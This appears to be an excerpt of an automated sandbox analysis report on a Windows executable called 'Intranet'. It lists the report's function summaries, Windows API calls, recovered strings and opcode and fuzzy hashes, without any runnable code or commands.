                                                                            • String ID: close all
                                                                            • API String ID: 469580280-3243417748
                                                                            • Opcode ID: d460e86e12d26774d18ff436dae532a87db8839e2666e366b919a1d927847d7e
                                                                            • Instruction ID: cc59ea00cf839843c1f3925119614d6f50eff41bceaed8193d51caba786f3d54
                                                                            • Opcode Fuzzy Hash: d460e86e12d26774d18ff436dae532a87db8839e2666e366b919a1d927847d7e
                                                                            • Instruction Fuzzy Hash: 41A18034701212CFCB29EF15C598E6AF764BF15705F1042AEE80AAB351CB39AD16CF99
                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,004FB13A), ref: 004FB078
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                            • API String ID: 3555792229-1603158881
                                                                            • Opcode ID: b8bcc91f0b266a95804c4a46b738881db75aab576a8166b7fbe3bfcbb5e42b31
                                                                            • Instruction ID: a6443f96ea9ad9334e946eecadc6ff573c86ecfc794e2783e7080ea4f75373d2
                                                                            • Opcode Fuzzy Hash: b8bcc91f0b266a95804c4a46b738881db75aab576a8166b7fbe3bfcbb5e42b31
                                                                            • Instruction Fuzzy Hash: C291A2B0A00109EACB48EF61C491BFAFB75FF04304F50811FEA5AA7251DF386959C7A9
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 004A327E
                                                                              • Part of subcall function 004A218F: GetClientRect.USER32(?,?), ref: 004A21B8
                                                                              • Part of subcall function 004A218F: GetWindowRect.USER32(?,?), ref: 004A21F9
                                                                              • Part of subcall function 004A218F: ScreenToClient.USER32(?,?), ref: 004A2221
                                                                            • GetDC.USER32 ref: 004DD073
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004DD086
                                                                            • SelectObject.GDI32(00000000,00000000,?,00000031,00000000,00000000), ref: 004DD094
                                                                            • SelectObject.GDI32(00000000,00000000,?,00000031,00000000,00000000), ref: 004DD0A9
                                                                            • ReleaseDC.USER32(?,00000000,?,00000031,00000000,00000000), ref: 004DD0B1
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004DD13C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: 458ed083077039d88c52a9db56157c0db5901cc4f463899e5775f32bceda1163
                                                                            • Instruction ID: 6e62eca5f154800410e27337bb063f883ab1e4afb78a8782ad759a5e3f284b90
                                                                            • Opcode Fuzzy Hash: 458ed083077039d88c52a9db56157c0db5901cc4f463899e5775f32bceda1163
                                                                            • Instruction Fuzzy Hash: 3C711331800205DFCF218F64C894AAA7BB5FF9A314F1442ABFD515A3A6D7398C42DB54
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                              • Part of subcall function 004A2714: GetCursorPos.USER32(?,?,005677B0,?,005677B0,005677B0,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?), ref: 004A2727
                                                                              • Part of subcall function 004A2714: ScreenToClient.USER32(005677B0,?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001), ref: 004A2744
                                                                              • Part of subcall function 004A2714: GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2769
                                                                              • Part of subcall function 004A2714: GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2777
                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0052C69C
                                                                            • ImageList_EndDrag.COMCTL32 ref: 0052C6A2
                                                                            • ReleaseCapture.USER32 ref: 0052C6A8
                                                                            • SetWindowTextW.USER32(?,00000000,?,?,00000000,?,00000000), ref: 0052C752
                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0052C765
                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0052C847
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                            • API String ID: 1924731296-2107944366
                                                                            • Opcode ID: 0fd1564a29288499881ffcc306d8dcbabebcc038584447b9edb60e578ad70049
                                                                            • Instruction ID: 3c44edc2339d214f906df6d7227f22d84e4cf36d6d48b2946643748964aeeb28
                                                                            • Opcode Fuzzy Hash: 0fd1564a29288499881ffcc306d8dcbabebcc038584447b9edb60e578ad70049
                                                                            • Instruction Fuzzy Hash: E4518870204305AFDB04EF24D85AF6A7BE1FF99318F00851EF555872E2DB70A948DB56
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0051211C
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?), ref: 00512148
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0051218A
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004,?,?,?,?,?,?,?,?,?), ref: 0051219F
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 005121AC
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 005121DC
                                                                            • InternetCloseHandle.WININET(00000000,0000000D,DEADBEEF,00000000,?,?,?,?,?,?,?,?,?), ref: 00512223
                                                                              • Part of subcall function 00512B4F: GetLastError.KERNEL32(?,?,00511EE3,00000000,00000000,00000001), ref: 00512B64
                                                                              • Part of subcall function 00512B4F: SetEvent.KERNEL32(?,?,00511EE3,00000000,00000000,00000001), ref: 00512B79
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 2603140658-3916222277
                                                                            • Opcode ID: 94c70aac56711d7a5ec9b3dd2421ca8ea03da8a7e3a79e02ec02b8b4c5040595
                                                                            • Instruction ID: efa926cf2db8ffa7c1e43454e26fd462b0a0de77ff161147f8b09edcbd33471a
                                                                            • Opcode Fuzzy Hash: 94c70aac56711d7a5ec9b3dd2421ca8ea03da8a7e3a79e02ec02b8b4c5040595
                                                                            • Instruction Fuzzy Hash: C4415BB5541209BFFB129F50CC89FFE7BACFB08354F00411AFA159A281D770AE949BA1
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00530980), ref: 00519412
                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00530980), ref: 00519446
                                                                            • #164.OLEAUT32(?,?,?,?,?,?,00530980), ref: 005195C0
                                                                            • #6.OLEAUT32(?,?,?,00530980), ref: 005195EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #164FileFreeLibraryModuleName
                                                                            • String ID:
                                                                            • API String ID: 2716333841-0
                                                                            • Opcode ID: 4102c100eaa8c70395afbb20772553f23accd2985d92f8ecf7cb2aeeaf4ae40f
                                                                            • Instruction ID: 7598bf049b1a160554cc3f7085a61373469f710f6dcda512fcf065a3bd65d553
                                                                            • Opcode Fuzzy Hash: 4102c100eaa8c70395afbb20772553f23accd2985d92f8ecf7cb2aeeaf4ae40f
                                                                            • Instruction Fuzzy Hash: E5F13975A00209EFDB04DF94C894EEEBBB9FF85314F108459F516AB291DB31AE85CB90
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0051FD9E
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051FF31
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0051FF55
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0051FF95
                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0051FFB7
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00520133
                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00520165
                                                                            • CloseHandle.KERNEL32(?), ref: 00520194
                                                                            • CloseHandle.KERNEL32(?), ref: 0052020B
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                            • String ID:
                                                                            • API String ID: 4090791747-0
                                                                            • Opcode ID: c1d78f4dfd26564e6c737689f934c802844f62ebaf46f05becb1f1ffc890e2c4
                                                                            • Instruction ID: 3a22e9e0f7cefed1cda42d5fd6bcf4631169205b3bbf34969cb66b8d79846bbd
                                                                            • Opcode Fuzzy Hash: c1d78f4dfd26564e6c737689f934c802844f62ebaf46f05becb1f1ffc890e2c4
                                                                            • Instruction Fuzzy Hash: ADE199312043019FD714EF25C895A6EBBE5BF86314F14892EF8899B2E2CB74EC45CB56
                                                                            APIs
                                                                              • Part of subcall function 00504BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00503B8A,?), ref: 00504BE0
                                                                              • Part of subcall function 00504BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00503B8A,?), ref: 00504BF9
                                                                              • Part of subcall function 00504FEC: GetFileAttributesW.KERNEL32(?,00503BFE), ref: 00504FED
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 005052FB
                                                                            • _wcscmp.LIBCMT ref: 00505315
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00505330
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 793581249-0
                                                                            • Opcode ID: ceae2e1d09a32dfac0fb1bce64b3465855d4391ffceeccb297641e737f57b4b3
                                                                            • Instruction ID: f5d75950722fc44cabd2d145ea5daa2666f9d2b83a7bbd11be914b3f92afabf2
                                                                            • Opcode Fuzzy Hash: ceae2e1d09a32dfac0fb1bce64b3465855d4391ffceeccb297641e737f57b4b3
                                                                            • Instruction Fuzzy Hash: 005184B24087855BC764DBA0D891DDFB7ECAF84300F50491FF689D3192EF74A6888B66
                                                                            APIs
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00528D24
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: InvalidateRect
                                                                            • String ID:
                                                                            • API String ID: 634782764-0
                                                                            • Opcode ID: ea534e9eedb4bdd1f93eee048f31b63c10b31942ba4aa43fb4a944c42690a744
                                                                            • Instruction ID: 4d6efc703092296306e487d2ccd031bf58dffe1a1c36cc1458e80faf352f76bc
                                                                            • Opcode Fuzzy Hash: ea534e9eedb4bdd1f93eee048f31b63c10b31942ba4aa43fb4a944c42690a744
                                                                            • Instruction Fuzzy Hash: 0151C130603224BFEB259FA8EC89B793F64BF16314F240516F614EB1E1CB71AD94DA50
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 004DC638
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004DC65A
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004DC672
                                                                            • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 004DC690
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004DC6B1
                                                                            • DestroyIcon.USER32(00000000), ref: 004DC6C0
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004DC6DD
                                                                            • DestroyIcon.USER32(?), ref: 004DC6EC
                                                                              • Part of subcall function 0052AAD4: DeleteObject.GDI32(00000000,?,?,?,004A2FDC,00000000), ref: 0052AB0D
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                            • String ID:
                                                                            • API String ID: 2819616528-0
                                                                            • Opcode ID: 3cccc487972044aeba4c8cfedbb5d3fe1aa9a8d0f0b02a32e42f1b50dfd83dae
                                                                            • Instruction ID: 06f9b159542ec76c320100d6125f68031f4a03e83f04d1451c1528a7323f96cd
                                                                            • Opcode Fuzzy Hash: 3cccc487972044aeba4c8cfedbb5d3fe1aa9a8d0f0b02a32e42f1b50dfd83dae
                                                                            • Instruction Fuzzy Hash: F951AC7060020AAFDB20DF28CD95BAA7BB5FB69710F10052AF902973D0D7B4ED50EB54
                                                                            APIs
                                                                              • Part of subcall function 004FB52D: GetWindowThreadProcessId.USER32(?,00000000,00000000,?,004FA23B,?,00000001), ref: 004FB54D
                                                                              • Part of subcall function 004FB52D: GetCurrentThreadId.KERNEL32 ref: 004FB554
                                                                              • Part of subcall function 004FB52D: AttachThreadInput.USER32(00000000,?,004FA23B,?,00000001), ref: 004FB55B
                                                                            • MapVirtualKeyW.USER32(00000025,00000000,?,00000001), ref: 004FA246
                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000,?,00000001), ref: 004FA263
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004FA266
                                                                            • MapVirtualKeyW.USER32(00000025,00000000,?,00000100,00000025,00000000,?,00000001), ref: 004FA26F
                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000,?,00000001), ref: 004FA28D
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004FA290
                                                                            • MapVirtualKeyW.USER32(00000025,00000000,?,00000100,00000027,00000000,?,00000001), ref: 004FA299
                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000,?,00000100,00000027,00000000,?,00000001), ref: 004FA2B0
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004FA2B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            • Opcode ID: c318e06eb98443bde24bd634c5584aa1fddc7fec990a552e08d49f630765a17b
                                                                            • Instruction ID: 2664db6c116251d1da270f7fe470a00178fc45baf3b2d5bc6f3567a650fd5e0b
                                                                            • Opcode Fuzzy Hash: c318e06eb98443bde24bd634c5584aa1fddc7fec990a552e08d49f630765a17b
                                                                            • Instruction Fuzzy Hash: 0511C2B1650618BEFA106B619C4AF7A3A1DEB4C754F111419F344AB2D0CAF65C50EAA4
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,004F915A,00000B00,?,?), ref: 004F94E2
                                                                            • HeapAlloc.KERNEL32(00000000,?,004F915A,00000B00,?,?), ref: 004F94E9
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004F915A,00000B00,?,?), ref: 004F94FE
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,004F915A,00000B00,?,?), ref: 004F9506
                                                                            • DuplicateHandle.KERNEL32(00000000,?,004F915A,00000B00,?,?), ref: 004F9509
                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,004F915A,00000B00,?,?), ref: 004F9519
                                                                            • GetCurrentProcess.KERNEL32(004F915A,00000000,?,004F915A,00000B00,?,?), ref: 004F9521
                                                                            • DuplicateHandle.KERNEL32(00000000,?,004F915A,00000B00,?,?), ref: 004F9524
                                                                            • CreateThread.KERNEL32(00000000,00000000,004F954A,00000000,00000000,00000000), ref: 004F953E
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            • Opcode ID: e9199f54e04ab6a0f10d1281fd4aff572add9f523683b768b61a04af6536a0d6
                                                                            • Instruction ID: 738aaf0d391c330c1a75f8dd021e0da5da73841c6592b5627982a0dfef3403a3
                                                                            • Opcode Fuzzy Hash: e9199f54e04ab6a0f10d1281fd4aff572add9f523683b768b61a04af6536a0d6
                                                                            • Instruction Fuzzy Hash: A101BBB5240308BFE750ABA5DC5DF6B7BACEB99711F105411FA05DB2E1CA74D804DB20
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 976b56139a2a021fdaf4c6f116a35842d23941f65a48c3244b92f8e36fd6e363
                                                                            • Instruction ID: 1c3afeb91c535700a727d5da359a215ace8d7844c7a3a17af72f0f28acd86b12
                                                                            • Opcode Fuzzy Hash: 976b56139a2a021fdaf4c6f116a35842d23941f65a48c3244b92f8e36fd6e363
                                                                            • Instruction Fuzzy Hash: 60C1B271A0121A9FEF11DF98C884BEEBBF5FB48314F158429E915AB281E770AD84CB51
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memset
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 2102423945-625585964
                                                                            • Opcode ID: 469452037ac6403cc0c4cf6798576765a56c55a7bc7e3c3becab77fa0a1eaa7d
                                                                            • Instruction ID: 0890fe2438f09c39e5e83f89e81846f84fe3457f10b7f57d2e6f31f9af4a26b6
                                                                            • Opcode Fuzzy Hash: 469452037ac6403cc0c4cf6798576765a56c55a7bc7e3c3becab77fa0a1eaa7d
                                                                            • Instruction Fuzzy Hash: 45916F71A00219ABEF24DFA5C864FEEBBB8FF85710F10855EF515AB240D7709985CBA0
                                                                            APIs
                                                                              • Part of subcall function 004F7D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?,?,004F8073), ref: 004F7D45
